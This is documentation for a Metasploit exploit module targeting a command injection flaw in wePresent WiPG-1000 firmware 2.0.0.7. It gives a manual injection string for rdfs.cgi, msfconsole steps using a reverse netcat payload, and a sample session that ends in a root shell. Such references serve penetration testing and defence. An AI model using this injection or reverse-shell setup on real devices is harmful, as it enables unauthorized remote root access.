infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/linux/http/wipg1000_cmd_injection.md

2.4 KiB
Raw Blame History

Vulnerable Application

This module exploits a command injection vulnerability in the wePresent WiPG-1000 device. A description of the exploited vulnerability is available in section 3.4 of this advisory. The latest vulnerable firmware version is 2.0.0.7. Newer versions can be downgraded to the older firmware.

There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method checks for the presence of the rdfs.cgi file and whether it contains the string https://www.redguard.ch/advisories/wepresent-wipg1000.txt. All known versions of this file on the device are vulnerable to this command injection.

Manual exploitation would equate to browsing to the URI http://<ip>/cgi-bin/rdfs.cgi and entering the String ; command; in the input field and submitting the form.

Version 2.0.0.7 was confirmed vulnerable, and firmware 2.2.3.0 was released to fix the exploit.

Verification Steps

  1. Make sure the device is running.
  2. Start msfconsole.
  3. Do: use exploit/linux/http/wipg1000_cmd_injection
  4. Do: set payload cmd/unix/reverse_netcat
  5. Do: set RHOST <ip>
  6. Do: set LHOST <ip>
  7. Do: exploit
  8. You should get a shell.

Options

PAYLOAD

The generic,netcat and openssl payload types are valid.

Scenarios

Firmware 2.0.0.7

The following is an example run getting a shell:

msf > use exploit/linux/http/wipg1000_cmd_injection 
msf exploit(wipg1000_cmd_injection) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(wipg1000_cmd_injection) > set RHOST 192.168.3.3
RHOST => 192.168.3.3
msf exploit(wipg1000_cmd_injection) > set LHOST 192.168.3.216
LHOST => 192.168.3.216
msf exploit(wipg1000_cmd_injection) > check
[*] 192.168.3.3:80 The target appears to be vulnerable.
msf exploit(wipg1000_cmd_injection) > exploit

[*] Started reverse TCP handler on 192.168.3.216:4444 
[*] Sending request
[*] Command shell session 1 opened (192.168.3.216:4444 -> 192.168.3.3:50893) at 2017-04-20 16:11:48 +0200
id

uid=0(root) gid=0(root) groups=0(root),10(wheel)